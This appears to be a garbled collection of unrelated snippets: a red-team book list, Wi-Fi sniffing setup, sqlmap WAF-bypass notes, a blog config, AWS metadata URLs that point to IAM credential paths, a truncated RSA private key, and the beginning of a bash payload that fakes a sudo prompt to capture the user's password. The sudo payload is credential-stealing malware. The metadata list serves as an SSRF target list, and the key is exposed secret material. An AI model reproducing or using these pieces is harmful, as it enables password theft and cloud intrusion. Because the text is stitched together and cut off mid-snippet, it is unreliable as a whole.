| Go to: chrome://net-internals/#modules | |
| Find Module by name, for e.g. "Alexa" | |
| Get it's ID: `cknebhggccemgcnbidipinkifmmegdel` | |
| Find chrome ext directory by profile: | |
| ``` | |
| $ sudo find / -iname "cknebhggccemgcnbidipinkifmmegdel" | |
| /home/devil/.config/google-chrome/Profile 1/Extensions/cknebhggccemgcnbidipinkifmmegdel | |
| ``` |
| From: http://redteams.net/bookshelf/ | |
| Techie | |
| Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp. | |
| Social Engineering: The Art of Human Hacking by Christopher Hadnagy | |
| Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam | |
| The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick | |
| Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others. | |
| Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor | |
| The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors |
| //Install Macports. | |
| //Install aircrack-ng: | |
| sudo port install aircrack-ng | |
| //Install the latest Xcode, with the Command Line Tools. | |
| //Create the following symlink: | |
| sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport | |
| //Figure out which channel you need to sniff: | |
| sudo airport -s | |
| sudo airport en1 sniff [CHANNEL] |
The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY
Below names are to be passed to the --tamper= parameter of sqlmap.
The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.
The scale is 0-5.
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000| --- | |
| minimal: | |
| artist: "Your Name" | |
| title: "Blog Title" | |
| description: "Blog description." | |
| theme: "sterdo" | |
| posts: | |
| in: /posts/in # => post in (md) | |
| out: /posts/out # => post out (html) |
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
| #!/usr/bin/env bash | |
| set -euo pipefail |
| -----BEGIN RSA PRIVATE KEY----- | |
| MIIEogIBAAKCAQEApyp3B6Jd/yGzmogaq6a1CbEyz5i9EDSTrCWIQuXj+9JPic0LB+Aql3zCCDH3 | |
| IJFCOeofrXObVKTWpGvUYGFrk92LR05ZQkrMVV5ZjNPF0mxUqnktyoQte5GvAh9dbwu6b0dMImvr | |
| W85nY7MtpbfYyxvup1YE9YPseGhiJhDtujXmUj5YMgX0wZzW2cNyOwN0dEjK/zFiuTLBvHEW9a82 | |
| JbvoKBhK/nMFwB09ZhG5ihfeLcevvoVmTRrHRvJbRqZpuQt6l4vQhUZsAJGPTwsI62M7KRdtqLy7 | |
| gLvajWc6DEAXdlD+MsjHW4ikDvWgnUCtPVBLFoK5q1uPAxU3fDNtRwIDAQABAoIBAEEu8tkcPBDn | |
| QFSKq/Ow/rj3yrtecKKoDck7nWWQpRSlznQKazm39IO7lyGA8j9VxQA2RgHpqXEZEcVtcpPeiQdQ | |
| hSXZ7D5IUmMbdknOrj2+FkmfFPb6EY40oYxvVIyfgyQvJgXqFQ1ob7JVxP/wr22Lx8Siay6dMZFG | |
| CreTNE++YPwBDqnJbMZDM9SJb/R+f+2BZFd9OqNe50pADp6pBpOdcSeRw5su+vNl3FB2kxH8G8ob | |
| 1COpWk/7esngTRYK30Im0QKJC8wCMafZnJPw92Sx62zmaE+9RXD8tdaqeKbhkJDZfej6YH88NJQs |
| # Create payload: replace sudo with an alias | |
| payload=' | |
| fake_sudo() { | |
| # Simulate a sudo prompt | |
| echo -n "[sudo] password for ${USER}: " | |
| read -s password | |
| echo | |
| # Run your command so you are happy | |
| echo "$password" | sudo -S "$@" | |
| # Do my evil stuff with your password |